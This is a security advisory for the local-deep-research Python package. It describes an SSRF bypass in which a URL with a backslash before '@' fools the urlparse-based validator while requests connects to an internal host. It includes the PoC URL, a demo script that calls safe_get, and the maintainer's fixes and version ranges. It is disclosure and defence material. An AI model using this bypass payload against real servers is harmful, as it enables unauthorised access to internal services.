GHSA-g23j-2vwm-5c25 · Medium · CVSS 5.0

local-deep-research has an SSRF bypass in `safe_get`

Published: May 28, 2026
Last Modified: May 28, 2026


📋 Description

Summary

The URL validation logic in local-deep-research contains a logic flaw that lets an attacker bypass the SSRF check and send requests to internal addresses.

Details

The project validates input URLs with validate_url. Its main logic extracts the host portion of the URL with urlparse and runs security checks on that host to prevent SSRF.

However, urlparse and the library that actually sends the request do not parse every URL the same way. In safe_get, for example, validate_url performs the SSRF check first, and requests.get then sends the actual request.

The core issue: urlparse() and requests disagree on which host a URL such as http://127.0.0.1:6666\@1.1.1.1 points to:

  • urlparse() treats \ as an ordinary character and @ as the userinfo-host delimiter, so everything before the @ becomes userinfo and the extracted hostname is 1.1.1.1 (public).
  • requests ends the authority at \ and treats \@1.1.1.1 as part of the path, so it connects to 127.0.0.1:6666 (internal).
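The disagreement can be observed directly by asking each parser for the host. The following is a minimal sketch, not the project's code: validator_host and client_host are hypothetical helper names, and the second helper assumes urllib3 (the parser the maintainer note says requests uses internally) is installed, returning None otherwise.

```python
from urllib.parse import urlparse


def validator_host(url: str):
    """Host as seen by a urlparse-based check (hypothetical helper)."""
    return urlparse(url).hostname


def client_host(url: str):
    """Host as seen by urllib3's parser; None if urllib3 is not installed."""
    try:
        from urllib3.util import parse_url
    except ImportError:
        return None
    return parse_url(url).host


# Raw string so the backslash reaches the parsers unchanged.
poc = r"http://127.0.0.1:6666\@1.1.1.1"

print("validator sees:", validator_host(poc))
print("client sees:   ", client_host(poc))
```

If the two printed hosts differ, any check performed on the first value says nothing about where the request will actually go.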

Below is a standalone test script that loads the project's safe_get directly from the source tree and calls it.

#!/usr/bin/env python3
"""Standalone demo: import project via absolute path and call safe_get."""

from __future__ import annotations

import importlib.util
import enum
import sys
import types
from pathlib import Path

# Hardcoded absolute path to the project's "src" directory.
SRC_ROOT = Path(
    r"d:\BaiduNetdiskDownload\local-deep-research-main\local-deep-research-main\src"
)

# Python 3.10 compatibility:
# project constants import StrEnum (available in Python 3.11+).
if not hasattr(enum, "StrEnum"):
    class _CompatStrEnum(str, enum.Enum):
        pass

    enum.StrEnum = _CompatStrEnum  # type: ignore[attr-defined]


def _load_safe_get():
    """Load safe_get directly from file, bypassing package __init__ imports."""
    ldr_pkg_name = "local_deep_research"
    security_pkg_name = "local_deep_research.security"

    # Build lightweight package modules so relative imports in safe_requests.py
    # resolve without executing package __init__.py files.
    if ldr_pkg_name not in sys.modules:
        ldr_pkg = types.ModuleType(ldr_pkg_name)
        ldr_pkg.__path__ = [str(SRC_ROOT / "local_deep_research")]  # type: ignore[attr-defined]
        sys.modules[ldr_pkg_name] = ldr_pkg

    if security_pkg_name not in sys.modules:
        security_pkg = types.ModuleType(security_pkg_name)
        security_pkg.__path__ = [str(SRC_ROOT / "local_deep_research" / "security")]  # type: ignore[attr-defined]
        sys.modules[security_pkg_name] = security_pkg

    module_name = "local_deep_research.security.safe_requests"
    module_path = SRC_ROOT / "local_deep_research" / "security" / "safe_requests.py"

    spec = importlib.util.spec_from_file_location(module_name, module_path)
    if spec is None or spec.loader is None:
        raise ImportError(f"Cannot load module from {module_path}")

    module = importlib.util.module_from_spec(spec)
    sys.modules[module_name] = module
    spec.loader.exec_module(module)
    return module.safe_get


safe_get = _load_safe_get()


def main() -> None:
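    # Hardcoded URL for demonstration. This one is blocked by validate_url.
    url = "http://127.0.0.1:6666"
    # Uncomment to test the bypass (raw string keeps the backslash literal).
    # url = r"http://127.0.0.1:6666\@1.1.1.1"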

    safe_get(url, timeout=15)


if __name__ == "__main__":
    main()

When an attacker uses http://127.0.0.1:6666/, the existing check recognizes the host as an internal address and blocks the request.

When an attacker uses http://127.0.0.1:6666\@1.1.1.1, the check extracts the host 1.1.1.1, a public IP address, so the URL passes validation. requests.get then sends the request to http://127.0.0.1:6666, so the check is bypassed and the SSRF succeeds.

PoC

http://127.0.0.1:6666\@1.1.1.1

Impact

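Server-side request forgery (SSRF): an attacker who controls a URL passed to safe_get can make the server send requests to loopback or internal-network addresses that validate_url is meant to block.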


Maintainer note (2026-05-15)

Thanks @Fushuling and @RacerZ-fighting for the detailed report. The remediation spans four PRs, all merged to main and shipped in v1.6.10:

#3873 (merged 2026-05-08) — the load-bearing fix for the parser-differential bypass:

  • New RFC_FORBIDDEN_URL_CHARS_RE in security/ssrf_validator.py rejects URLs containing backslash, ASCII control bytes, or whitespace — RFC 3986 forbids these and their presence signals a parser-differential attempt.
  • Host extraction switched from urllib.parse.urlparse(url).hostname to urllib3.util.parse_url(url).host. urllib3 is the parser requests uses internally, so the validator and the HTTP client now agree on the destination by construction — closing the \@ divergence that drove the PoC.
  • Same two-layer defence applied to NotificationURLValidator.validate_service_url.
  • 53 new tests across test_ssrf_validator.py, test_notification_validator.py, test_safe_requests.py, and test_ssrf_redirect_bypass.py, including the advisory PoC http://127.0.0.1:6666\@1.1.1.1 and the post-prepare canonical form http://127.0.0.1:6666/%5C@1.1.1.1.
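The two layers described for #3873 can be sketched roughly as follows. This is an illustration under stated assumptions, not the shipped code: the regex pattern is a guess at what RFC_FORBIDDEN_URL_CHARS_RE covers, is_url_allowed is a hypothetical name, and urlsplit stands in for urllib3.util.parse_url only to keep the example standard-library-only (the actual fix uses urllib3 so that validator and client share one parser). Hostname resolution checks are out of scope here.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Assumed pattern: backslash, ASCII control bytes (0x00-0x1F, 0x7F), and space.
FORBIDDEN_CHARS_RE = re.compile(r"[\\\x00-\x20\x7f]")


def is_url_allowed(url: str) -> bool:
    """Hypothetical two-layer check: reject forbidden characters, then the host."""
    # Layer 1: characters that RFC 3986 does not allow in a URL.
    if FORBIDDEN_CHARS_RE.search(url):
        return False
    # Layer 2: extract the host and reject non-public IP literals.
    host = urlsplit(url).hostname
    if host is None:
        return False
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return True  # a DNS name; resolving and checking it is not shown here
    return ip.is_global


print(is_url_allowed(r"http://127.0.0.1:6666\@1.1.1.1"))      # rejected by layer 1
print(is_url_allowed("http://127.0.0.1:6666/%5C@1.1.1.1"))    # rejected by layer 2
print(is_url_allowed("http://1.1.1.1/"))
```

The first layer stops the raw PoC before any parsing happens; the second catches the percent-encoded canonical form, where the backslash is gone but the host is still 127.0.0.1.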

#3882 (merged 2026-05-08) — hardens the metadata-IP block and redacts userinfo from log output so rejected URLs don't leak credentials to logs.
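As an illustration of the log-redaction idea only, the sketch below masks the userinfo part of a URL before it is logged. redact_userinfo is a hypothetical name and the "***" placeholder is an assumption; the actual implementation in #3882 may differ.

```python
from urllib.parse import urlsplit, urlunsplit


def redact_userinfo(url: str) -> str:
    """Replace any userinfo in the URL with a fixed placeholder (hypothetical helper)."""
    parts = urlsplit(url)
    if "@" not in parts.netloc:
        return url
    # Keep only what follows the last "@" (host and optional port).
    host_part = parts.netloc.rpartition("@")[2]
    return urlunsplit(parts._replace(netloc="***@" + host_part))


print(redact_userinfo("https://user:secret@example.com/path?q=1"))
```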

#3889 (merged 2026-05-09) — locks in real-world URL fixtures and behavior invariants from #3873/#3882 as regression tests.

#3932 (merged 2026-05-10) — blocks IPv6 transition prefixes (2002::/16 6to4, 64:ff9b::/96 NAT64, 2001::/32 Teredo, 100::/64 discard) so private IPv4 destinations cannot be reached via an IPv6-wrapped form. NAT64 has an operator opt-in (LDR_SECURITY_ALLOW_NAT64=true) for IPv6-only deployments, but cloud metadata IPs remain blocked regardless.
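A prefix check of this kind can be sketched with the standard ipaddress module. The four prefixes are the ones listed above; the function name in_transition_prefix is hypothetical, and the NAT64 opt-in is not modelled.

```python
import ipaddress

# Prefixes named in the maintainer note for #3932.
TRANSITION_PREFIXES = [
    ipaddress.ip_network(prefix)
    for prefix in ("2002::/16", "64:ff9b::/96", "2001::/32", "100::/64")
]


def in_transition_prefix(host: str) -> bool:
    """True if host is an IPv6 literal inside one of the listed prefixes."""
    ip = ipaddress.ip_address(host)
    return ip.version == 6 and any(ip in net for net in TRANSITION_PREFIXES)


# A 6to4 address that embeds 127.0.0.1 in bits 16-47.
wrapped = ipaddress.ip_address("2002:7f00:1::")
print(wrapped.sixtofour)                          # the embedded IPv4 address
print(in_transition_prefix("2002:7f00:1::"))      # 6to4
print(in_transition_prefix("64:ff9b::7f00:1"))    # NAT64
print(in_transition_prefix("2606:4700:4700::1111"))
```

Blocking the whole prefix avoids having to decode each embedding scheme separately, at the cost of also rejecting wrapped public addresses.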

Affected versions

  • The specific parser-differential bypass described above exists from v1.3.0 (when validate_url was first introduced) through v1.6.9. The validator used urlparse(url).hostname for that entire span.
  • Versions before v1.3.0 had no SSRF validator at all — requests went directly to requests.get() without any host check. Those versions are vulnerable to SSRF via this URL and any other internal address; the parser-differential trick is unnecessary.

In both cases the remediation is the same: upgrade to v1.6.10 or later.
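The version ranges above can be expressed as a small classifier, for example when auditing a list of deployed versions. This is a sketch: classify_version is a hypothetical helper, and it compares only the leading major.minor.patch numbers, so pre-release suffixes are ignored.

```python
import re


def classify_version(version: str) -> str:
    """Map a local-deep-research version string to its status per this advisory."""
    match = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if match is None:
        raise ValueError(f"Unrecognized version string: {version!r}")
    parsed = tuple(int(part) for part in match.groups())
    if parsed >= (1, 6, 10):
        return "patched"
    if parsed >= (1, 3, 0):
        return "vulnerable: parser-differential bypass"
    return "vulnerable: no SSRF validator"


for v in ("1.2.5", "1.3.0", "1.6.9", "1.6.10"):
    print(v, "->", classify_version(v))
```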

🎯 Affected products (1)

  • pip/local-deep-research:< 1.6.10
